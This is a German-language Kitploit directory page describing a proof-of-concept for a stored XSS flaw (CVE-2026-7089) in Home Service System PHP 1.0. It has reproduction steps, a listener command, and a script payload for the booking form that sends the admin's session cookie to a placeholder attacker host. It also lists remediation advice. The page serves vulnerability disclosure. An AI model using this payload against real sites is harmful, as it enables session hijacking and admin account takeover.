Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-7089-XSS — Proof-of-Concept für CVE-2026-7089, eine gespeicherte XSS-Schwachstelle in Home Service System PHP 1.0, die eine nicht authentifizierte Übernahme der Admin-Sitzung über das Buchungsformular ermöglicht. | Kitploit
Tools/GitHubGitHub/xmyronn/cve-2026-7089-xss
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubxmyronn/cve-2026-7089-xss

CVE-2026-7089-XSS

Proof-of-Concept für CVE-2026-7089, eine gespeicherte XSS-Schwachstelle in Home Service System PHP 1.0, die eine nicht authentifizierte Übernahme der Admin-Sitzung über das Buchungsformular ermöglicht.

Repository anzeigen
2vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

home-service-system-unauth-stored-xss-admin-takeover

Schwachstellendetails

FeldDetails
Anbietercode-projects.org
ProduktHome Service System In PHP
Version1.0
SchwachstellentypStored Cross-Site Scripting (XSS)
CWECWE-79
Authentifizierung erforderlichNein
AutorImad Alvi

Beschreibung

Eine Stored Cross-Site Scripting (XSS)-Schwachstelle existiert in der Datei booking.php von Home Service System In PHP 1.0. Nicht authentifizierte Benutzer können bösartige JavaScript-Payloads über die Buchungsformularfelder injizieren. Die nicht bereinigte Eingabe wird in der Datenbank gespeichert und ohne Ausgabekodierung im Admin-Panel (admin.php) gerendert, wo sie im Browser-Kontext des Administrators ausgeführt wird.

Dies ermöglicht einem nicht authentifizierten Angreifer, das Admin-Sitzungscookie zu stehlen, Aktionen im Namen des Administrators durchzuführen oder das Admin-Konto vollständig zu kompromittieren.


Betroffene Komponente

  • Datei: booking.php
  • Parameter: fname, lname
  • Sink: admin.php → Buchungen verwalten

Schritte zur Reproduktion

  1. Navigieren Sie als nicht authentifizierter Benutzer zur Buchungsseite: http://TARGET/homeservices/booking.php?provider=

    Screenshot 2026-04-08 221145
  2. Injizieren Sie im Feld Vorname die folgende Payload:

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
  1. Füllen Sie die übrigen Felder mit beliebigen gültigen Daten und senden Sie die Buchung ab.

  2. Starten Sie einen Listener auf Ihrem Angreifer-Rechner:

root@kitploit:~
php -S 0.0.0.0:PORT
  1. Warten Sie, bis der Administrator den Bereich „Buchungen verwalten“ in admin.php aufruft.

  2. Die Payload wird im Browser des Administrators ausgeführt und exfiltriert das Sitzungscookie an Ihren Listener.

    Screenshot 2026-04-08 221158
Screenshot 2026-04-08 221214

Proof of Concept

Payload (Alert)

root@kitploit:~
<script>alert(1)</script>
Screenshot 2026-04-08 220538

Payload (Session-Hijacking)

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>

Auswirkungen

Diese Schwachstelle ermöglicht einem entfernten, nicht authentifizierten Angreifer, die Anwendung vollständig zu kompromittieren.

Ein Angreifer kann:

  • Beliebigen JavaScript-Code im Browser des Administrators ausführen
  • Das Admin-PHPSESSID-Sitzungscookie stehlen
  • Die Admin-Sitzung übernehmen und vollen administrativen Zugriff erlangen
  • Beliebige administrative Aktionen durchführen (Buchungen, Anbieter usw. verwalten)

Dies führt zu einer vollständigen Kompromittierung der Anwendung.

Behebung

  • Wenden Sie htmlspecialchars() mit ENT_QUOTES auf alle benutzergenerierten Eingaben an, bevor Sie sie speichern oder rendern
  • Implementieren Sie einen Content-Security-Policy-Header (CSP)
  • Validieren und bereinigen Sie alle Formulareingaben serverseitig

Referenzen

  • Home Service System In PHP - code-projects.org
Tool herunterladen